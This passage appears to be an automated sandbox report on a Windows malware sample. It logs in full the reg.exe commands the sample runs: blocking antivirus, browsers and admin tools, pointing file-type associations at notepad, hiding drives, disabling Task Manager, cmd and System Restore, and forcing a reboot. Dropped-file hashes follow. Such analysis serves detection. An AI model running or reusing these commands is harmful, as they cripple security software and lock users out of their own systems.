C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "48" /t REG_SZ /d "spideragent.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "49" /t REG_SZ /d "uTorrent.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "50" /t REG_SZ /d "firefox.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "51" /t REG_SZ /d "regedt32.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "52" /t REG_SZ /d "resmon.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "53" /t REG_SZ /d "Defender.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "54" /t REG_SZ /d "DefenderDaemon.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "55" /t REG_SZ /d "mbam.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "56" /t REG_SZ /d "mbamtray.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "57" /t REG_SZ /d "MBAMWsc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "58" /t REG_SZ /d "mbuns.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "59" /t REG_SZ /d "MbamPt.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "60" /t REG_SZ /d "MBAMService.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "61" /t REG_SZ /d "assistant.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "62" /t REG_SZ /d "malwarebytes_assistant.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "63" /t REG_SZ /d "ig.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "64" /t REG_SZ /d "browser.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "65" /t REG_SZ /d "am800.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "66" /t REG_SZ /d "TOTALCMD64.EXE" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "67" /t REG_SZ /d "TOTALCMD32.EXE" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "68" /t REG_SZ /d "TOTALCMD86.EXE" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "69" /t REG_SZ /d "WatchDog.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "70" /t REG_SZ /d "ProductAgentUI.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "71" /t REG_SZ /d "ProductAgentService.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "72" /t REG_SZ /d "DiscoverySrv.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "73" /t REG_SZ /d "BDSubWiz.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "74" /t REG_SZ /d "bdreinit.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "75" /t REG_SZ /d "agentpackage.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "76" /t REG_SZ /d "setuppackage.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "77" /t REG_SZ /d "7zFM.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "78" /t REG_SZ /d "procexp64.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "79" /t REG_SZ /d "procexp.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "80" /t REG_SZ /d "WinRAR.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "81" /t REG_SZ /d "BdVpnService.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "82" /t REG_SZ /d "BdVpnApp.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "83" /t REG_SZ /d "bdservicehost.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "84" /t REG_SZ /d "bdagent.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "85" /t REG_SZ /d "bdredline.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "86" /t REG_SZ /d "ekrn.exe " /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "87" /t REG_SZ /d "eguiProxy.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "88" /t REG_SZ /d "egui.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "89" /t REG_SZ /d "AvastNM.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "90" /t REG_SZ /d "AVGBrowserCrashHandler.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "91" /t REG_SZ /d "AVGBrowserCrashHandler64.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "92" /t REG_SZ /d "AVGUI.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "93" /t REG_SZ /d "AVGSvc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "94" /t REG_SZ /d "aswEngSrv.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "95" /t REG_SZ /d "wsc_proxy.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "96" /t REG_SZ /d "am807.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "97" /t REG_SZ /d "artmoney.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "98" /t REG_SZ /d "chemax.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "99" /t REG_SZ /d "Cheat Engine.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "100" /t REG_SZ /d "aswidsagent.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "101" /t REG_SZ /d "AvastBrowserCrashHandler.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "102" /t REG_SZ /d "AvastBrowserCrashHandler64.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "103" /t REG_SZ /d "AvastBrowserCrashHandler32.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "104" /t REG_SZ /d "AvastBrowserCrashHandler86.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "105" /t REG_SZ /d "MSASCui.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "106" /t REG_SZ /d "msdt.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "107" /t REG_SZ /d "MRT.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "108" /t REG_SZ /d "msiexec.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "109" /t REG_SZ /d "msseces.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "110" /t REG_SZ /d "control.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "111" /t REG_SZ /d "mmc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "112" /t REG_SZ /d "opera_crashreporter.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "113" /t REG_SZ /d "opera_autoupdate.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "114" /t REG_SZ /d "opera.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "115" /t REG_SZ /d "MicrosoftEdge.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "116" /t REG_SZ /d "MicrosoftEdgeCP.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "117" /t REG_SZ /d "MicrosoftEdgeSH.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "118" /t REG_SZ /d "launcher.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "119" /t REG_SZ /d "regedit.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Windows\1.jpg /f3⤵
- Sets desktop wallpaper using registry
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\mp3file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\mp4file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\exefile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies system executable filetype association
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\pngfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\icofile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\pdffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\docxfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\docfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\csvfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\hfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\cppfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\oggfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\avifile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\isofile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\zipfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\rarfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\pptfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\mkvfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\xlsxfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\jpgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\jpegfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\tiffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\tmpfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\dmgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\slnfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\7zfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\afile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\aafile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\001file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\allfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\binfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\asmfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\svgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\bmpfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\gzfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\cabfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\cfgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\cmdfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\comfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies system executable filetype association
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\cplfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\ctfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\curfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\dllfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\htmfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\htmlfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\wshfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\vbsfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\jsfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\logfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\wsffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\jarfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\cplfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSecurityTab /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d "67108863" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d "67108863" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d "2" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v RestrictToPermittedSnapins /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d "2" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "121" /t REG_SZ /d "cmd.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "120" /t REG_SZ /d "powershell.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DisableCAD /d "0" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t REG_DWORD /v "DisableRegistryTools" /d "1" /f3⤵
-
C:\Windows\SysWOW64\shutdown.exeshutdown -r -t 203⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3954855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.batFilesize
848B
MD5e59c7d9f080b068e3118e81385f467e7
SHA178ea57d55558847121cb70367d10dc9c6e833a26
SHA2565c9bee6ecba73cda027b99dea013cd54f53524e35750da629f53c841d75b6e8f
SHA512b452ccd1009f7976f4ba2f44c117bf2faee0768f22e9c55e41f16d4695cdcd296f0a4321de8dc4855536b364844dffad5df0d46cb711f1c49f024e3afc043475
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\42.exeFilesize
27KB
MD5daf9159a8fbc9510e9dc380c2cae924d
SHA15e1bf2dbe567ffc04c194b31de4f4e15c630cae5
SHA25643118bc6f1c03b9f749efc244d7fd0553d45ec50ae2e4ea363e17f85f832290f
